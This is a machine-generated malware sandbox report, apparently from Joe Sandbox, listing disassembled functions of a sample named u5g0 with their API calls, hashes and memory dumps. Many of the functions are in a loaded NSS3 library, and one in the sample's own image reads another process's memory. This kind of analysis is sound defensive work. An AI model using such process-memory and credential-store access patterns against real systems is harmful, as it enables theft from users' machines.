Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,6BBF204A), ref: 6BC608CB
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608D7
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608FB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 9ded38c5d88b7dfb7c0f1cc7da14e890039477bd136fff92a2a4a5c1d4c3e595
Instruction ID: e32076748519f5bcac16e224b7bdfb4a33355c3afb110118f2aa006b8ecba852
Opcode Fuzzy Hash: 9ded38c5d88b7dfb7c0f1cc7da14e890039477bd136fff92a2a4a5c1d4c3e595
Instruction Fuzzy Hash: 54317CB4904A118FEB10EF78D08542ABBF4FF09354B058969DCA99B301EB34E990CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC59AC0 Relevance: 12.1, APIs: 8, Instructions: 76networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(?,00000017,6BC599BE), ref: 6BC59AE6
ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6BC599BE), ref: 6BC59AFC
WSAGetLastError.WSOCK32(?,00000017,6BC599BE), ref: 6BC59B26
WSAGetLastError.WSOCK32(00000000,8004667E,00000001,?,00000017,6BC599BE), ref: 6BC59B36
PR_SetError.NSS3(FFFFE896,00000000,00000000,8004667E,00000001,?,00000017,6BC599BE), ref: 6BC59B41
closesocket.WSOCK32(00000000,00000017,6BC599BE), ref: 6BC59B4A
#7.WSOCK32(00000000,0000FFFF,00001002,6BC599BE,00000017,00000000,8004667E,00000001,?,00000017,6BC599BE), ref: 6BC59B6D
#21.WSOCK32(00000000,0000FFFF,00001002,6BC599BE,00000017,00000000,0000FFFF,00001002,6BC599BE,00000017,00000000,8004667E,00000001,?,00000017), ref: 6BC59B92

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Error$Last$closesocketioctlsocketsocket
String ID:
API String ID: 312597714-0
Opcode ID: 8f8071d2f1f8ee5faa7fde161e719729637527512a290ea760933779b6875b6b
Instruction ID: c5ad75ba292a3bf52e7eb2cd2a73a71d938e3585f056d53ecccb7d4d7c2ea10c
Opcode Fuzzy Hash: 8f8071d2f1f8ee5faa7fde161e719729637527512a290ea760933779b6875b6b
Instruction Fuzzy Hash: B621D4B1D1011567FB219BA58C02ABF777DDF46729F000165E850AA181F7BC9B2487F6

Uniqueness

Uniqueness Score: -1.00%

Function 6BC63A80 Relevance: 10.7, APIs: 7, Instructions: 201timeCOMMON

Download Yara Rule

APIs

_localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?), ref: 6BC63AB1
PR_NormalizeTime.NSS3(?,?), ref: 6BC63B12
__aulldiv.LIBCMT ref: 6BC63BF0
_localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?,000F423F,?,000F4240,00000000), ref: 6BC63C25
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BC63CA7
__aulldiv.LIBCMT ref: 6BC63CCB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BC63CDB

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: __aulldiv_errno_localtime64_s$NormalizeTime
String ID:
API String ID: 3963911192-0
Opcode ID: 01d07eeb6fb901e60dff685a70944bbdbf82278acf99062403db9815c5305d02
Instruction ID: a81d45c99f8c570e2d8e05f8a69156104813da0659eb52e9ab3225d0fe357014
Opcode Fuzzy Hash: 01d07eeb6fb901e60dff685a70944bbdbf82278acf99062403db9815c5305d02
Instruction Fuzzy Hash: C271D272A046059FC718CF3CCD81A5AB7E6AFC9304F098A2DF945DB291F774EA058B80

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC8B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BCC8B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6BCC8BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6BCC8D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BCC8D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6BCC8D72

Strings

OID., xrefs: 6BCC8BA4

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: OID.
API String ID: 4247295491-3585844982
Opcode ID: eb6becfb0852a7b3c668409a934e552e0cae7d5def24e054a2ed49a95633038d
Instruction ID: 72321ab4bf41c4f06634e9fce0f4920f251619fdb1529a0c75b53000450cd41b
Opcode Fuzzy Hash: eb6becfb0852a7b3c668409a934e552e0cae7d5def24e054a2ed49a95633038d
Instruction Fuzzy Hash: E05108B1F111254BCB208B18CC90BBBB3B4EB65755F0445E9E919DB382E3389F858B96

Uniqueness

Uniqueness Score: -1.00%

Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BDF
??_U@YAPAXI@Z.MSVCRT ref: 00413C0D

Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5

VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
??_V@YAXPAX@Z.MSVCRT ref: 00413D73

Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8

Strings

Z>A, xrefs: 00413C38, 00413C3B
@, xrefs: 00413C66

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$Z>A
API String ID: 2950663791-2427737632
Opcode ID: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction ID: 18b3d1c53e1ab9283c7d4f20bb5e0d2682d9205760932c7229ac25ba092b9e39
Opcode Fuzzy Hash: c34cf874e28939f0e2f9d61df82db9ff8d9d9859511bff8662e41e87a2571aa0
Instruction Fuzzy Hash: 2851F9B5D00109ABDB04CF98E981AEFB7B5FF88305F108119F919A7340D738AA51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BC7BA90 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6BD03CAF,?), ref: 6BC7BABF
PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6BD03CAF,?), ref: 6BC7BAD5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6BD03CAF,?), ref: 6BC7BB08
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6BD03CAF,?), ref: 6BC7BB1A
SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6BD03CAF,?), ref: 6BC7BB3B
PR_SetError.NSS3(FFFFE005,00000000,6BD03CAF,?), ref: 6BC7BB5F
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6BD03CAF,?), ref: 6BC7BB75

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_$CopyErrorFreeItem_memset
String ID:
API String ID: 3944093909-0
Opcode ID: 8f20564b91dae92ad9def858f6634b738a4cbe907818951d4c420d8c6c739663
Instruction ID: 67bead1114e9114b274cfcdb8e8f61022ff893a31cc96de0158eec9bd33a3968
Opcode Fuzzy Hash: 8f20564b91dae92ad9def858f6634b738a4cbe907818951d4c420d8c6c739663
Instruction Fuzzy Hash: 7F212272A102149BEB10AB69DD91B2B77A5EF80318F15407AED2CDB394F734AE00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BCCFBD0 Relevance: 10.6, APIs: 7, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BCCFC12
free.MOZGLUE(?), ref: 6BCCFC2B
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6BCCFC44
realloc.MOZGLUE(?,?), ref: 6BCCFC54
PR_SetError.NSS3(FFFFE013,00000000), ref: 6BCCFC68
PORT_ArenaGrow_Util.NSS3(?,?,?,?), ref: 6BCCFC76
PORT_Alloc_Util.NSS3(?), ref: 6BCCFC81

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Grow_freerealloc
String ID:
API String ID: 1441890768-0
Opcode ID: 9fa595b3e4ec229c2773ae0aef0904ec6d83705c1bbf55ec7f4c676ee1d1ebe7
Instruction ID: 94c3153d3f43bb9c0a52f306716deb8429f31417cb3c68c05a0b1e1253fc8bf7
Opcode Fuzzy Hash: 9fa595b3e4ec229c2773ae0aef0904ec6d83705c1bbf55ec7f4c676ee1d1ebe7
Instruction Fuzzy Hash: 55212FB4B247116FF7304FAA9C81B17B25CBF60B48F144139AD5986602F72CD71882E3

Uniqueness

Uniqueness Score: -1.00%

Function 6BCA9A80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetInterfaceList), ref: 6BCA9A9C
PR_LogPrint.NSS3( interfaces = 0x%p,?), ref: 6BCA9AB5

Part of subcall function 6BD809D0: PR_Now.NSS3 ref: 6BD80A22
Part of subcall function 6BD809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6BD80A35
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6BD80A66
Part of subcall function 6BD809D0: PR_GetCurrentThread.NSS3 ref: 6BD80A70
Part of subcall function 6BD809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6BD80A9D
Part of subcall function 6BD809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6BD80AC8
Part of subcall function 6BD809D0: PR_vsmprintf.NSS3(?,?), ref: 6BD80AE8
Part of subcall function 6BD809D0: EnterCriticalSection.KERNEL32(?), ref: 6BD80B19
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80B48
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80C76
Part of subcall function 6BD809D0: PR_LogFlush.NSS3 ref: 6BD80C7E

PR_LogPrint.NSS3( pulCount = %d,?), ref: 6BCA9ACE

Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80B88
Part of subcall function 6BD809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6BD80C5D
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6BD80C8D
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80C9C
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(?), ref: 6BD80CD1
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6BD80CEC
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80CFB
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6BD80D16
Part of subcall function 6BD809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6BD80D26
Part of subcall function 6BD809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6BD80D35
Part of subcall function 6BD809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6BD80D65
Part of subcall function 6BD809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6BD80D70
Part of subcall function 6BD809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6BD80D90
Part of subcall function 6BD809D0: free.MOZGLUE(00000000), ref: 6BD80D99

Strings

C_GetInterfaceList, xrefs: 6BCA9A97
interfaces = 0x%p, xrefs: 6BCA9AB0
pulCount = %d, xrefs: 6BCA9AC9

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: DebugOutputString$Printfflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: interfaces = 0x%p$ pulCount = %d$C_GetInterfaceList
API String ID: 2403058783-663131679
Opcode ID: 16a1a3835ca305f1b035684ff1d149e9170c99dafa3aa7ad56ea91b64bd1aaa1
Instruction ID: 6681b689d4f2a7378ed901e1bacad61f64b09e8d18508ae305159f9f13945c06
Opcode Fuzzy Hash: 16a1a3835ca305f1b035684ff1d149e9170c99dafa3aa7ad56ea91b64bd1aaa1
Instruction Fuzzy Hash: 5E11E734511105AFEB10DF65DC8AB15B7A5E7C23ADF084066E448DB112FB79CE44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6BD8CBE0 Relevance: 10.5, APIs: 7, Instructions: 46COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000010), ref: 6BD8CBEA
PR_NewLock.NSS3 ref: 6BD8CBF9

Part of subcall function 6BD398D0: calloc.MOZGLUE(00000001,00000084,6BC60936,00000001,?,6BC6102C), ref: 6BD398E5

PR_NewCondVar.NSS3(00000000), ref: 6BD8CC05

Part of subcall function 6BC5BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BC621BC), ref: 6BC5BB8C

free.MOZGLUE(00000000), ref: 6BD8CC1C
DeleteCriticalSection.KERNEL32(-0000001C), ref: 6BD8CC34
free.MOZGLUE(00000000), ref: 6BD8CC41
free.MOZGLUE(00000000), ref: 6BD8CC47

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: callocfree$CondCriticalDeleteLockSection
String ID:
API String ID: 687540378-0
Opcode ID: e64e53912416ad5fb090bd17ee090b4f50a441e0c175c817240c45c8c38ef186
Instruction ID: 700ba1508a4a39c70c4c3d700345bfbff17a8df1d4e9a528a90bafd713068bae
Opcode Fuzzy Hash: e64e53912416ad5fb090bd17ee090b4f50a441e0c175c817240c45c8c38ef186
Instruction Fuzzy Hash: 83F04C756402029BF7105B799C49A5B7A4CDF466B6F0C0134FE4DCB202EB19D411C3F6

Uniqueness

Uniqueness Score: -1.00%

Function 6BD08AF0 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,00000000,?,?,6BCF6F38), ref: 6BD08B0B
NSS_OptionGet.NSS3(00000008,?), ref: 6BD08B58
NSS_OptionGet.NSS3(00000009,?), ref: 6BD08B6A
NSS_GetAlgorithmPolicy.NSS3(00000159,00000000,?,?,00000000,?,?,6BCF6F38), ref: 6BD08BBB
NSS_OptionGet.NSS3(0000000A,?), ref: 6BD08C08
NSS_OptionGet.NSS3(0000000B,?), ref: 6BD08C1A

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Option$AlgorithmPolicy
String ID:
API String ID: 927613807-0
Opcode ID: c59312f12f08098d16a848e5abea180dc59f33ee608bb437702faa051aca5d7a
Instruction ID: d3177e088c782ff10ebb35fb41ad2a177a257aa4e609100935b675391e3ea02a
Opcode Fuzzy Hash: c59312f12f08098d16a848e5abea180dc59f33ee608bb437702faa051aca5d7a
Instruction Fuzzy Hash: 6C411565A011058BEF009FA8DCA17AE77B5DBC1368F808421C98DDF1C0FB299A418796

Uniqueness

Uniqueness Score: -1.00%

Function 6BCE1B60 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6BCE39EC,?,00000000), ref: 6BCE1B87
PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6BCE39EC,?,00000000), ref: 6BCE1B9C
PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,?,?,6BCE39EC,?,00000000), ref: 6BCE1BCE
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6BCE39EC,?,00000000), ref: 6BCE1BE8
SECOID_FindOIDTag_Util.NSS3(6BCE39EC,?,?,?,?,?,?,?,?,6BCE39EC,?,00000000), ref: 6BCE1C20

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Alloc_Arena$Arena_FindTag_memset
String ID:
API String ID: 3594443183-0
Opcode ID: dd348bdb4bbaa5cedace21604bf6a594cbf647c3396f6bdfaa598b39aa051178
Instruction ID: 34d3fc807c621debfb8dab302631ebc104f8035d241df230e1f2b90e4c2c52e2
Opcode Fuzzy Hash: dd348bdb4bbaa5cedace21604bf6a594cbf647c3396f6bdfaa598b39aa051178
Instruction Fuzzy Hash: 2731C8B6A10210DBE7008B6AEC45B2A77E9AF84754F054479EC09CB351FB39EE11CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC96B70 Relevance: 9.1, APIs: 6, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BC96BA9

Part of subcall function 6BC99520: PK11_IsLoggedIn.NSS3(00000000,?,6BCC379E,?,00000001,?), ref: 6BC99542

PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BC96BC0
PORT_ArenaAlloc_Util.NSS3(00000000,0000001C,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BC96BD7
PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6BC96B97

Part of subcall function 6BCB1870: TlsGetValue.KERNEL32 ref: 6BCB18A6
Part of subcall function 6BCB1870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6BC96C34,?,?,00000001,00000000,00000007,?), ref: 6BCB18B6
Part of subcall function 6BCB1870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BC96C34,?,?), ref: 6BCB18E1
Part of subcall function 6BCB1870: PR_SetError.NSS3(00000000,00000000), ref: 6BCB18F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6BC96C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6BC96C61

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: a39578affe04f291b7305159acc9f74b9583065a9894b6bea6710596a6ab315a
Instruction ID: 250b27456a3515fa3d0d604786b9bb4548a9ce61f691d30dae4c11ebaf477454
Opcode Fuzzy Hash: a39578affe04f291b7305159acc9f74b9583065a9894b6bea6710596a6ab315a
Instruction Fuzzy Hash: DD31D2B5A202019BF700AFA9EC82F6A77A4EB45754F050079FE085B382F779DA51C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00417BAE

Part of subcall function 00417641: __mtinitlocknum.LIBCMT ref: 00417657
Part of subcall function 00417641: __amsg_exit.LIBCMT ref: 00417663
Part of subcall function 00417641: EnterCriticalSection.KERNEL32(00000000,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D,?,?,00417158,00000000,00421AC0,0041719F), ref: 0041766B

DecodePointer.KERNEL32(004219C8,00000020,00417CF1,00000000,00000001,00000000,?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D), ref: 00417BEA
DecodePointer.KERNEL32(?,00417D13,000000FF,?,00417668,00000011,00000000,?,00417A49,0000000D,?,?,004173CF,0041726D), ref: 00417BFB

